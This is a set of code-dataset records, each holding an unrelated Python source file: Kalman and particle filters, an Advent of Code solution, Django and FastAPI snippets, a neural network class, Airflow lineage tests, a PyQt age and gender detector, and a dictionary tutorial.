np.zeros(n)\n F = np.zeros(n)\n K = np.zeros(n)\n\n # Compute the values\n for i in range(0, n - 1):\n if not np.isnan(y[i]):\n v[i] = y[i] - Z * a[i] - d ### allow for intercept\n if isinstance(H, float):\n F[i] = Z * P[i] * Z + H\n else:\n F[i] = Z * P[i] * Z + H\n K[i] = phi * P[i] * Z * (1 / F[i])\n a[i + 1] = omega + phi * a[i] + K[i] * v[i]\n P[i + 1] = phi * P[i] * phi + R * Q * R - K[i] * F[i] * K[i]\n else:\n v[i] = np.nan\n F[i] = 10 ** 9\n K[i] = 0\n a[i + 1] = a[i]\n P[i + 1] = P[i] + Q\n\n v[-1] = y[len(y) - 1] - Z * a[-1]\n F[-1] = P[-1] + H\n return a, P, v, F, K\n\n\ndef loglik_SV(theta, y):\n # Construct known and theta\n H = np.pi ** 2 / 2\n Z = 1\n d = -1.27\n omega = theta[0] ### c\n phi = theta[1] ### T\n R = 1\n Q = theta[2]### sigma_etasquared\n a_1 = np.mean(y)\n P_1 = Q / (1 - phi ** 2)\n\n a, P, v, F, K = Kalman_Filter_SV(y, H, Q, phi, R, Z, a_1, P_1, d, omega)\n l = (-1 / 2) * np.log(2 * np.pi) - (1 / 2) * np.log(F) - (1 / 2) * np.square(v) / F\n llik = np.mean(l)\n\n return -llik\n\n\n# QML SV model\noptions = {'eps': 1e-07, # argument convergence criteria\n 'disp': True, # display iterations\n 'maxiter': 5000} # maximum number of iterations\nML_SV = optimize.minimize(loglik_SV, np.array([0.001, 0.9, 0.5]), args=(Y), method='SLSQP', options=options)\nprint(ML_SV)\n\nH = np.pi ** 2 / 2\nZ = 1\nd = -1.27\nomega = ML_SV.x[0] ### c\nphi = ML_SV.x[1] ### T\nR = 1\nQ = ML_SV.x[2]### sigma_etasquared\na_1 = np.mean(Y)\nP_1 = Q / (1 - phi ** 2)\n\na, P, v, F, K = Kalman_Filter_SV(Y, H, Q, phi, R, Z, a_1, P_1, d, omega)\n\nAlpha_hat, V, r, N, L = state_smoother_SV(a, P, v, F, Y, phi, Z, K)\n\n# d)\n### Figures\nplt.figure(1, figsize=(15,4))\nplt.plot(Alpha_hat[1:], color='black', label='$h_{t}$ smoothed')\nplt.plot(a[1:], color='red', label='$h_{t}$')\nplt.scatter(range(len(Y) - 1), Y[1:], s=2, color = 'black')\nplt.legend()\n\nksi = omega / (1 - phi)\nH_vec_smoothed = Alpha_hat - ksi\nH_vec = a - ksi\n\nplt.figure(1, figsize=(15,4))\nplt.plot(H_vec_smoothed, color='black', label='$H_{t}$ smoothed')\nplt.plot(H_vec, color='red', 
label='$H_{t}$')\nplt.legend()\n\n#f)\nraw_data= exchange.values\n\ndef particle_filter(y, phi, Q, N, ksi):\n T= len(y)\n theta_tilde = np.zeros((N,T))\n sigma = np.zeros(N)\n w_tilde = np.zeros(N)\n w_norm = np.zeros(N)\n H_estimate = np.zeros(T)\n mu = np.mean(y)\n\n\n\n # Now we obtain all the theta tildes\n theta_tilde[:, 0] = np.random.normal(loc=0,\n scale=np.sqrt(Q / (1 - phi ** 2)), size=N)\n # and the unconditional sigma\n sigma[:] = np.exp((1/2)*(theta_tilde[:, 0]+ksi))\n # obtain w tilde\n #w_tilde[:] = (1/(sigma[:]*np.sqrt(2*np.pi)))*np.exp((-(y[0]-mu)**2)/(2*sigma[:]**2)) #### Include pdf function of normal with differing loc and scale\n w_tilde[:] = norm.pdf(y[0], loc = mu, scale = sigma[:])\n # then we normalize the weights\n\n w_norm[:] = w_tilde[:] / np.sum(w_tilde[:])\n\n # then we compute a hat, which is an estimate of H in the case of our SV model\n H_estimate[0] = np.sum(w_norm[:] * theta_tilde[:, 0])\n theta_tilde[:, 0] = np.random.choice(theta_tilde[:, 0], p=w_norm[:])\n\n\n\n for j in range(1, T):\n # Now we obtain all the theta tildes\n theta_tilde[:, j] = np.random.normal(loc=phi * theta_tilde[:, j - 1], scale=np.sqrt(Q), size=N)\n # and the unconditional sigma\n sigma[:] = np.exp((1/2)*(theta_tilde[:, 0]+ksi))\n # obtain w tilde\n #w_tilde[:] = (1/(sigma[:]*np.sqrt(2*np.pi)))*np.exp((-(y[j]-mu)**2)/(2*sigma[:]**2))\n w_tilde[:] = norm.pdf(y[j], loc = mu, scale = sigma[:])\n # then we normalize the weights\n w_norm[:] = w_tilde[:] / np.sum([w_tilde[:]])\n # then we compute a hat, which is an estimate of H in the case of our SV model\n H_estimate[j] = np.sum(w_norm[:] * theta_tilde[:, j])\n # and we resample the theta for the next period\n theta_tilde[:, j] = np.random.choice(theta_tilde[:, j], p=w_norm[:], replace = True)\n\n return H_estimate\n\n# H_particle_vector = np.zeros((100, len(raw_data)))\n# H_particle = np.zeros(len(raw_data))\n#\n# for i in range(0, 100):\n# H_particle_vector[i,:] = particle_filter(raw_data, phi, Q, 10000, ksi)\n#\n#\n\nnp.random.seed(2003)\nH_particle = particle_filter(raw_data, phi, Q, 10000, ksi)\n\nplt.figure(1, figsize=(15,4))\nplt.plot(H_particle, color= 'red', label = 'Particle filter', linestyle= 'dashed')\n# for i in range(0, 100):\n# plt.plot(H_particle_vector[i, :], color='red', label='Particle filter', linestyle='dashed')\nplt.plot(H_vec, color= 'black', label= 'Kalman filter')\nplt.legend()\nplt.show()\n\nnp.random.seed(2008)\nH_particle = particle_filter(raw_data, phi, Q, 10000, ksi)\n\nplt.figure(1, figsize=(15,4))\nplt.plot(H_particle, color= 'red', label = 'Particle filter', linestyle= 'dashed')\n# for i in range(0, 100):\n# plt.plot(H_particle_vector[i, :], color='red', label='Particle filter', linestyle='dashed')\nplt.plot(H_vec, color= 'black', label= 'Kalman filter')\nplt.legend()\nplt.show()\n\n\n","repo_name":"thomasvollebregt97/WDPS","sub_path":"Assignment2_final.py","file_name":"Assignment2_final.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"9906309955","text":"import os.path\n\ninput_file = os.path.join(os.path.dirname(__file__), \"input.txt\")\nwith open(input_file, \"r\") as f:\n data = f.read().splitlines()\n\ntemplate = data[0]\nrules = {k: v for k, v in (x.split(\" -> \") for x in data[2:])}\n\nfor step in range(10):\n new_template = [template[0]]\n for i in range(len(template) - 1):\n pair = template[i : i + 2]\n if pair in rules:\n new_template.append(rules[pair])\n 
new_template.append(pair[1])\n else:\n new_template.append(pair[1])\n template = \"\".join(new_template)\n\ncounts = {}\nfor char in template:\n counts[char] = counts.get(char, 0) + 1\nsort_counts = tuple(sorted(counts.values(), reverse=True))\nprint(sort_counts[0] - sort_counts[-1])\n","repo_name":"tctree333/Advent-Of-Code","sub_path":"2021/Day 14/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70805956205","text":"from django.core.management.base import BaseCommand\nfrom apimonitor.models import User, Transaction\nfrom faker import Faker\nimport random\nimport decimal\n\n\nclass Command(BaseCommand):\n help = \"Seed the users and transactions tables with initial data\"\n\n def handle(self, *args, **options):\n fake = Faker()\n tiers = [choice[0] for choice in User.TIER_CHOICES]\n\n # Seed Users\n users = []\n for _ in range(10):\n user = User(\n email=fake.email(),\n account_balance=decimal.Decimal(random.uniform(100, 500000)),\n tier=random.choice(tiers),\n )\n users.append(user)\n User.objects.bulk_create(users)\n\n # Seed Transactions\n transactions = []\n for user in User.objects.all():\n for _ in range(random.randint(0, 20)):\n recipient = random.choice(User.objects.exclude(pk=user.pk))\n transaction = Transaction(\n amount=decimal.Decimal(random.uniform(1000, 200000)),\n sender=user,\n to=recipient,\n narration=fake.sentence(),\n )\n transactions.append(transaction)\n Transaction.objects.bulk_create(transactions)\n\n self.stdout.write(self.style.SUCCESS(\"Database seeded successfully\"))\n","repo_name":"aoamusat/herconomy","sub_path":"seeder/seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22085166666","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom methods import users, rooms\n\n\napp = FastAPI()\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\napp.mount('/users', users)\napp.mount('/rooms', rooms)","repo_name":"horanchikk/AnonyME","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"3762452344","text":"from numpy import argmax\nfrom sys import maxsize\n\nfrom ai.improvement import Improvement\n\n\nclass ImprovementWithQ(Improvement):\n def __init__(self, decay_rate, decay, decay_max, decay_min):\n \"\"\"\n A policy improvement method which uses the calculated q-values.\n :param decay_rate: rate at which decay nears its minimum.\n :param decay: starting decay.\n :param decay_max: maximum decay.\n :param decay_min: minimum decay.\n \"\"\"\n super(ImprovementWithQ, self).__init__(decay_rate, decay, decay_max, decay_min)\n\n def improve(self):\n for s in range(self.mdp.n_states):\n a_star = argmax([self.q[s][a] for a in range(self.mdp.n_actions)])\n\n for a in range(self.mdp.n_actions):\n self.policy[s][a] = 1. 
* self.decay / self.mdp.n_actions\n\n if a_star == a:\n self.policy[s][a] += 1 - self.decay\n return super(ImprovementWithQ, self).improve()\n","repo_name":"TheRealJP/Markov-Decision-Proces","sub_path":"ai/improvements/with_q.py","file_name":"with_q.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"30375891922","text":"from __future__ import annotations\nfrom typing import List, Callable, TypeVar, Tuple\nfrom chap7.layer import Layer\nfrom chap7.util import sigmoid, derivative_sigmoid\n\nT = TypeVar(\"T\")\n\n\nclass Network:\n def __init__(\n self,\n layer_structure: List[int],\n learning_rate: float,\n activation_function: Callable[[float], float] = sigmoid,\n derivative_activation_function: Callable[[float], float] = derivative_sigmoid,\n ) -> None:\n if len(layer_structure) < 3:\n raise ValueError(\"Error: Network should have 3 layers at least.\")\n self.layers: List[Layer] = []\n input_layer: Layer = Layer(\n None,\n layer_structure[0],\n learning_rate,\n activation_function,\n derivative_activation_function,\n )\n self.layers.append(input_layer)\n for previous, num_neurons in enumerate(layer_structure[1:]):\n next_layer = Layer(\n self.layers[previous],\n num_neurons,\n learning_rate,\n activation_function,\n derivative_activation_function,\n )\n self.layers.append(next_layer)\n\n def outputs(self, input_: List[float]) -> List[float]:\n value = input_\n for layer in self.layers:\n value = layer.outputs(value)\n return value\n\n def backpropagate(self, expected: List[float]) -> None:\n # output layer\n self.layers[-1].calculate_deltas_for_output_layer(expected)\n # hidden layers\n for l in range(len(self.layers) - 2, 0, -1):\n self.layers[l].calculate_deltas_for_hidden_layer(self.layers[l + 1])\n\n def update_weights(self) -> None:\n for layer in self.layers[1:]:\n for neuron in layer.neurons:\n for i, w in enumerate(neuron.weights):\n # assign back into the list; rebinding the loop variable would leave the weights unchanged\n neuron.weights[i] = w + (\n neuron.learning_rate\n * layer.previous_layer.output_cache[i]\n * neuron.delta\n )\n\n def train(self, inputs: List[List[float]], expecteds: List[List[float]]) -> None:\n for input_, expected in zip(inputs, expecteds):\n self.outputs(input_)\n self.backpropagate(expected)\n self.update_weights()\n\n def validate(\n self,\n inputs: List[List[float]],\n expecteds: List[T],\n interpret_output: Callable[[List[float]], T],\n ) -> Tuple[int, int, float]:\n correct: int = 0\n for input_, expected in zip(inputs, expecteds):\n result: T = interpret_output(self.outputs(input_))\n if result == expected:\n correct += 1\n percentage: float = correct / len(inputs)\n return correct, len(inputs), percentage\n","repo_name":"tatsuya4559/ClassicComputerScienceProblemsInPython","sub_path":"chap7/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"29101797639","text":"\nimport os\nimport data\nimport math\nimport utils\nimport network\n\nimport numpy as np\nimport tensorflow as tf\n\nSHOW_PLOT = 'SHOW_PLOT' in os.environ\n\n# Training parameters\nNUM_EPOCHS = int(os.environ.get('NUM_EPOCHS', 500))\nLEARNING_RATE = float(os.environ.get('LEARNING_RATE', 1e-5))\n\nMAX_VIDEOS = math.inf\nif 'RUNNING_ON_LOCAL' in os.environ:\n MAX_VIDEOS = 4\n\n# Initialize frame loader\nframe_loader = data.FeatureLoader(max_videos=MAX_VIDEOS)\ninput_size = frame_loader.BOTTLENECK_TENSOR_SIZE\ncells_x = frame_loader.cells_x\ncells_y = frame_loader.cells_y\n\n# Split 
in train, validation and test\nframe_loader = utils.ValidationMinibatches(frame_iterator=frame_loader, cache=frame_loader.data_can_fit_in_memory())\n\n# Setup network\nnn = network.LogisticClassifier(name='simple-features-model-1',\n input_shape=(None, input_size),\n target_shape=(None, cells_x * cells_y + 1), learning_rate=LEARNING_RATE,\n verbose=True)\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nwith tf.Session(config=config) as sess:\n nn.init(sess)\n\n lossTracker = utils.LossTracker(name=nn.name, num_epochs=NUM_EPOCHS, verbose=True)\n for epoch in range(0, NUM_EPOCHS):\n\n train_loss = 0.\n train_batches = 0\n for features, targets in frame_loader.train:\n train_loss += nn.train_op(session=sess, x=features / features.std(), y=targets)\n train_batches += 1\n train_loss /= train_batches\n\n val_loss = 0.\n val_batches = 0\n for features, targets in frame_loader.val:\n val_loss += nn.val_op(session=sess, x=features / features.std(), y=targets)\n val_batches += 1\n val_loss /= val_batches\n\n lossTracker.addEpoch(train_loss=train_loss, val_loss=val_loss)\n\n # Save model\n nn.save(sess)\n\n # Finally evaluate on test data\n test_loss = 0.\n test_batches = 0\n for features, targets in frame_loader.test:\n test_loss += nn.val_op(session=sess, x=features / features.std(), y=targets)\n test_batches += 1\n test_loss /= test_batches\n\n lossTracker.addFinalTestLoss(test_loss)\n lossTracker.save()\n","repo_name":"LasseRegin/02456-project","sub_path":"code/logistic_features_classifier.py","file_name":"logistic_features_classifier.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37419869433","text":"import socket\nfrom unittest import mock\n\nimport pytest\nfrom airflow.models import Connection\n\nfrom astro.table import Metadata, Table\n\n\n@pytest.mark.integration\n@pytest.mark.parametrize(\n \"connection,name,namespace,uri\",\n [\n (\n Connection(\n conn_id=\"test_bq\", conn_type=\"gcpbigquery\", extra={\"project\": \"astronomer-dag-authoring\"}\n ),\n \"astronomer-dag-authoring.dataset.test_tb\",\n \"bigquery\",\n \"bigquery:astronomer-dag-authoring.dataset.test_tb\",\n ),\n (\n Connection(\n conn_id=\"test_redshift\",\n conn_type=\"redshift\",\n schema=\"astro\",\n host=\"local\",\n port=5439,\n login=\"astro-sdk\",\n password=\"\",\n ),\n \"astro.test_tb\",\n \"redshift://local:5439\",\n \"redshift://local:5439/astro.test_tb\",\n ),\n (\n Connection(\n conn_id=\"test_pg\",\n conn_type=\"postgres\",\n login=\"postgres\",\n password=\"postgres\",\n host=\"postgres\",\n port=5432,\n ),\n \"public.test_tb\",\n \"postgresql://postgres:5432\",\n \"postgresql://postgres:5432/public.test_tb\",\n ),\n (\n Connection(\n conn_id=\"test_snow\",\n conn_type=\"snowflake\",\n host=\"local\",\n port=443,\n login=\"astro-sdk\",\n password=\"\",\n schema=\"ci\",\n extra={\n \"account\": \"astro-sdk\",\n \"region\": \"us-east-1\",\n \"role\": \"TEST_USER\",\n \"warehouse\": \"TEST_ASTRO\",\n \"database\": \"TEST_ASTRO\",\n },\n ),\n \"TEST_ASTRO.ci.test_tb\",\n \"snowflake://astro-sdk\",\n \"snowflake://astro-sdk/TEST_ASTRO.ci.test_tb\",\n ),\n (\n Connection(conn_id=\"test_sqlite\", conn_type=\"sqlite\", host=\"/tmp/sqlite.db\"),\n \"/tmp/sqlite.db.test_tb\",\n f\"file://{socket.gethostbyname(socket.gethostname())}:22\",\n f\"file://{socket.gethostbyname(socket.gethostname())}:22/tmp/sqlite.db.test_tb\",\n ),\n (\n Connection(conn_id=\"test_duckdb\", conn_type=\"duckdb\", 
host=\"/tmp/duckdb.db\"),\n \"/tmp/duckdb.db.test_tb\",\n f\"file://{socket.gethostbyname(socket.gethostname())}:22\",\n f\"file://{socket.gethostbyname(socket.gethostname())}:22/tmp/duckdb.db.test_tb\",\n ),\n (\n Connection(\n conn_id=\"test_mssql\",\n conn_type=\"mssql\",\n host=\"someserver.com\",\n schema=\"astrodb\",\n port=1433,\n login=\"username\",\n password=\"password\",\n ),\n \"astrodb.dataset.test_tb\",\n \"mssql://someserver.com:1433\",\n \"mssql://someserver.com:1433/astrodb.dataset.test_tb\",\n ),\n (\n Connection(\n conn_id=\"test_mysql\",\n conn_type=\"mysql\",\n host=\"someserver.com\",\n schema=\"astrodb\",\n port=3306,\n login=\"username\",\n password=\"password\",\n ),\n \"dataset.test_tb\",\n \"mysql://someserver.com:3306\",\n \"mysql://someserver.com:3306/dataset.test_tb\",\n ),\n ],\n)\n@mock.patch(\"airflow.providers.google.cloud.utils.credentials_provider.get_credentials_and_project_id\")\n@mock.patch(\"airflow.hooks.base.BaseHook.get_connection\")\ndef test_openlineage_dataset(mock_get_connection, gcp_cred, connection, name, namespace, uri):\n \"\"\"\n Test that name and namespace for lineage is correct for databases\n \"\"\"\n mock_get_connection.return_value = connection\n gcp_cred.return_value = \"astronomer-dag-authoring\", \"astronomer-dag-authoring\"\n tb = Table(conn_id=connection.conn_id, name=\"test_tb\", metadata=Metadata(schema=\"dataset\"))\n\n assert tb.openlineage_dataset_name() == name\n assert tb.openlineage_dataset_namespace() == namespace\n assert tb.openlineage_dataset_uri() == uri\n","repo_name":"astronomer/astro-sdk","sub_path":"python-sdk/tests_integration/sql/test_table.py","file_name":"test_table.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","stars":294,"dataset":"github-code","pt":"19"} +{"seq_id":"22627933267","text":"import sqlite3\nimport threading\n\nimport cv2\nimport sys\nimport os\nfrom PyQt5.QtGui import QImage, QPixmap\nfrom qtconsole.qt import QtGui, QtCore\nimport keyboard\nfrom PyQt5.QtCore import pyqtSlot, QTimer\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog, QSplashScreen, QProgressBar\nfrom PyQt5.uic import loadUi\n\nimport DisplayImage\nimport DisplayVideo\nimport GenderAndAge\n\n\nclass Main(QMainWindow):\n def __init__(self):\n super(Main, self).__init__()\n self.ImageName = \"\"\n self.video = None\n self.resizeImage = None\n self.resultImage = None\n self.cap = None\n self.timer = QTimer(self)\n loadUi('GenderAndAgeGitUI.ui', self)\n self.getPersonImage.clicked.connect(self.GetImageFromDrive)\n self.computeImage.clicked.connect(self.ComputeImage)\n\n\n @pyqtSlot()\n def GetImageFromDrive(self):\n self.showResult.setText(\"Click Guess For\" + \"\\n\" + \"Result\")\n fname, filter = QFileDialog().getOpenFileName(self, 'Open File', 'c:\\\\', \"Image Files(*.jpg)\")\n if fname:\n self.LoadImage(fname)\n else:\n print(\"invalid Input\")\n\n @pyqtSlot()\n def ComputeImage(self):\n self.showResult.setText(\"Running...\")\n age_net, gender_net = GenderAndAge.initialize_caffe_models()\n font = cv2.FONT_HERSHEY_SIMPLEX\n\n self.resultImage = cv2.imread(self.ImageName, 1)\n self.resultImage = cv2.resize(self.resizeImage, (300,450), fx=2, fy=2, interpolation=cv2.INTER_AREA)\n cv2.threshold(self.resultImage, 127, 255, cv2.THRESH_BINARY)\n\n face_cascade = cv2.CascadeClassifier('Model/haarcascade_frontalface_alt.xml')\n\n gray = cv2.cvtColor(self.resultImage, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.2, 4)\n\n if (len(faces) > 
0):\n print(\"Found {} faces\".format(str(len(faces))))\n\n for (x, y, w, h) in faces:\n cv2.rectangle(self.resultImage, (x, y), (x + w, y + h), (255, 255, 0), 2)\n\n # Get Face\n face_img = self.resultImage[y:y + h + 50, x:x + w + 50].copy()\n\n blob = cv2.dnn.blobFromImage(face_img, 1, (227, 227), GenderAndAge.MODEL_MEAN_VALUES, swapRB=False)\n\n # Predict Gender\n gender_net.setInput(blob)\n gender_preds = gender_net.forward()\n gender = GenderAndAge.gender_list[gender_preds[0].argmax()]\n print(\"Gender : \" + gender)\n\n # Predict Age\n age_net.setInput(blob)\n age_preds = age_net.forward()\n age = GenderAndAge.age_list[age_preds[0].argmax()]\n print(\"Age Range: \" + age)\n\n self.showResult.setText(\"Gender : \" + gender + \"\\n\" + \"Age :\" + age)\n\n overlay_text = \"%s %s\" % (gender,age)\n\n cv2.putText(self.resultImage, overlay_text, (x-10, y-10), font, .6, (255, 255, 255), 1, cv2.LINE_AA)\n\n\n\n DisplayImage.DisplayResultImage(self)\n\n\n\n def StartLiveCam(self):\n self.LoadVideo(0)\n\n def LoadVideo(self, vname):\n self.cap = cv2.VideoCapture(vname)\n self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 4000)\n self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, 750)\n self.timer.timeout.connect(self.update_frame)\n self.timer.start(10)\n\n def LoadImage(self, fname):\n self.image = cv2.imread(fname)\n self.resizeImage = cv2.resize(self.image, (300, 450))\n self.ImageName = fname\n DisplayImage.DisplayImage(self)\n\n def update_frame(self):\n font = cv2.FONT_HERSHEY_SIMPLEX\n age_net, gender_net = GenderAndAge.initialize_caffe_models()\n ret, self.video = self.cap.read()\n face_cascade = cv2.CascadeClassifier('Model/haarcascade_frontalface_alt.xml')\n gray = cv2.cvtColor(self.video, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.1, 5)\n if len(faces) > 0:\n print(\"Found {} faces\".format(str(len(faces))))\n\n for (x, y, w, h) in faces:\n cv2.rectangle(self.video, (x, y), (x + w, y + h), (255, 255, 0), 2)\n\n # Get Face\n face_img = self.video[y:y + h + 50, x:x + w + 50].copy()\n\n blob = cv2.dnn.blobFromImage(face_img, 1, (227, 227), GenderAndAge.MODEL_MEAN_VALUES, swapRB=False)\n\n # Predict Gender\n gender_net.setInput(blob)\n gender_preds = gender_net.forward()\n gender = GenderAndAge.gender_list[gender_preds[0].argmax()]\n print(\"Gender : \" + gender)\n\n # Predict Age\n age_net.setInput(blob)\n age_preds = age_net.forward()\n age = GenderAndAge.age_list[age_preds[0].argmax()]\n print(\"Age Range: \" + age)\n overlay_text = \"%s %s\" % (gender, age)\n cv2.putText(self.video, overlay_text, (x, y), font, 1, (255, 255, 255), 2, cv2.LINE_AA)\n\n DisplayVideo.DisplayVideo(self, self.video, 1)\n # startCapture = threading.Thread(target=GenderAndAge.read_from_camera(self), )\n # startCapture.start()\n\n\napp = QApplication(sys.argv)\nwindows = Main()\nwindows.setWindowTitle('Project Name ')\nwindows.show()\n\nsys.exit(app.exec_())\n","repo_name":"ubihacks/Gender-and-Age-Detection-Caffee-Models","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12481118769","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\nfrom finstar_task.views import ReceiptView, ProductView, ShopView, UserShopView, ReceiptListView\n\nrouter = DefaultRouter()\nrouter.register(r'receipt', ReceiptView, basename='receipt')\nrouter.register(r'product', ProductView, 
basename='product')\nrouter.register(r'shop', ShopView, basename='shop')\nrouter.register(r'user_shop', UserShopView)\nrouter.register('receipt_list', ReceiptListView)\n\nurlpatterns = [\n path('', include(router.urls)),\n path('admin/', admin.site.urls),\n]\n","repo_name":"leget1987/finstar","sub_path":"finstar/finstar/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12949507029","text":"from database.database import *\n\ndef select_university(university_id):\n university_dict = get_universities()\n try:\n university = university_dict[university_id]\n return university\n except Error as e:\n print(e, 'Wrong university id')\n\ndef show_universities():\n university_dict = get_universities()\n for id, university in university_dict.items():\n print(f'ID: {id} | {university}')\n\ndef select_program(university_id, program_id):\n programs = get_program_list(university_id)\n try:\n return programs[program_id]\n except Error as e:\n print(e, 'Wrong index')\n\ndef show_programs(university_id):\n university_dict = get_universities()\n programs = get_program_list(university_id)\n try:\n university = university_dict[university_id]\n except Error as e:\n print(e, 'Wrong index')\n print('Showing the programs of the university {}:'.format(university))\n for t, program in enumerate(programs):\n print(t, ':', program)\n\ndef select_courses(program, university_id, courses_list):\n courses_df = get_courses(program, university_id)\n descriptions = []\n courses = []\n for _, (_, course, _) in courses_df.iloc[courses_list].iterrows():\n descriptions.append(get_course_description(course, university_id))\n courses.append(course)\n return courses, descriptions\n\ndef show_courses(program_id, university_id):\n university_dict = get_universities()\n programs = get_program_list(university_id)\n try:\n university = university_dict[university_id]\n program = programs[program_id]\n except Error as e:\n print(e, 'Wrong index')\n courses_df = get_courses(program, university_id)\n print('University:', university)\n print('Showing available courses for the program:', program)\n for t, (_, course, _) in courses_df.iterrows():\n print(t,':',course)\n\ndef test_summarization():\n '''\n Test function that selects automatically the university, the program and a \n selection courses with the following selection:\n - University: IT University\n - Program: msc data science\n - Courses: [0, 4, 5, 7, 9, 10, 12]\n '''\n university_id = 1\n university = select_university(university_id)\n program = select_program(university_id, 0)\n courses_list = [0, 4, 5, 7, 9, 10, 12]\n courses, descriptions = select_courses(program, university_id, courses_list)\n return courses, descriptions, university, program","repo_name":"israfelsr/course-summarization","sub_path":"summarization/retrieve_data.py","file_name":"retrieve_data.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"3934383518","text":"# creating dict\n# user={'name':'Rahul','age':'21'}\nuser=dict(name='Rahul',age=21)\n# print(user)\n# print(type(user))\n# access data from dict\n# using key \n# print(user['name'])\nuser_info={\n 'name':'Rahul',\n 'age':21,\n 'fav_movie':['hollywood','south'],\n}\n# print(user_info['fav_movie'])\n# how to add data in empty dict\nuser1={}\nuser1['name']='mohit'\n# print(user1)\n\n# in keyword in dict\n# if 'names' in 
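# --- Illustrative aside on the membership checks above: the in operator on a dict tests keys only; values and key/value pairs need the explicit views. Toy demo: ---\ndemo = {'name': 'Rahul', 'age': 21}\nassert 'name' in demo # key lookup\nassert 21 in demo.values() # value lookup\nassert ('name', 'Rahul') in demo.items() # pair lookup\n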
user_info:\n# print('present')\n# else:\n# print('not present')\n\n\n# for values\n# if 21 in user_info.values():\n# print('present')\n# else:\n# print('not present')\n\n\n# loops\n# for i in user_info.values():\n# print(i)\n\n# values method\n# user_info_values=user_info.values()\n# print(user_info_values)\n# print(type(user_info_values))\n\n\n# keys method\n# user_info_values=user_info.keys()\n# print(user_info_values)\n# print(type(user_info_values))\n\n# \n# for i in user_info:\n# print(user_info[i])\n# \n\n# items method\nuser_items=user_info.items()\n# print(user_items)\n# print(type(user_items))\n\n# for key,value in user_info.items():\n# print(f\"key is {key} and value is {value} \")\n\n# how to add data\nuser_info['fav_song']=['song1','song2']\n# print(user_info)\n\n\n# pop method\n# pop_item=user_info.pop('fav_song')\n# print(pop_item)\n# print(user_info)\n\n\n# === popitem method\n# popped_item=user_info.popitem()\n# print(user_info)\n# print(type(popped_item))\n\n# ==== update method\nmore_info={'state':'haryana','hobbies':['coding','reading','cricket']}\nuser_info.update(more_info)\n# print(user_info)\n\n\n\n\n# ==== fromkeys ====\n# d=dict.fromkeys(['name','age','height'],'unknown')\n# d=dict.fromkeys('abc','unknown')\nd=dict.fromkeys(range(1,11),'unknown')\nprint(d)","repo_name":"Rahullchaudhary/Python","sub_path":"dict_intro.py","file_name":"dict_intro.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"16548046553","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\n#\t\t\t\t\t\t\tKnown result \t Predicted results\t\t\t Want to plot?\t For Multianalysis \tfor pdf save\ndef predictionY_interval(binsTab, y_train, y_test, y_pred_onTrain, y_pred_onTest, plotResult, computeInterval, pdfName='yPred'): #Function form to use in Multianalysis\n\t\n\tinterval=yTrainSHist=yTrainBHist=yTestSHist=yTestBHist=0\t\t\t\t\t\t\t\t\t\t\t# For the return if not computed\n\tyTestS=y_pred_onTest[y_test==1]\n\tyTestB=y_pred_onTest[y_test==0]\n\n\tif plotResult:\n\t\tyTrainS=y_pred_onTrain[y_train==1]\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Take values at index depending on BDT y output\n\t\tyTrainB=y_pred_onTrain[y_train==0]\n\t\t\n\t\tfig, ax = plt.subplots(figsize=(8, 4), dpi=300) \t\t\t\t\t\t\t\t\t\t\t\t# Want to stack histograms on top of same axes\n\t\tax.hist(yTrainS, bins=binsTab, color='r',histtype='bar',density=True, alpha=0.3) \t\t\t\t# Adding transparency for histogram columns\n\t\tax.hist(yTrainB, bins=binsTab, color='b', histtype='bar',density=True, alpha=0.3) \t\t\t\t# collect the results in variables for later KS test\n\t\tyTrainSHist = ax.hist(yTrainS, bins=binsTab, color='r', histtype='step',density=True, label='Signal (train)') \t# Histogram values\n\t\tyTrainBHist = ax.hist(yTrainB, bins=binsTab, color='b', histtype='step',density=True, label='Background (train)') \n\t\tyTestSHist = plt.hist(yTestS, bins=binsTab, density=True,alpha = 0.0)\t\t\t\t\t\t\t# Invisible to collect histogram 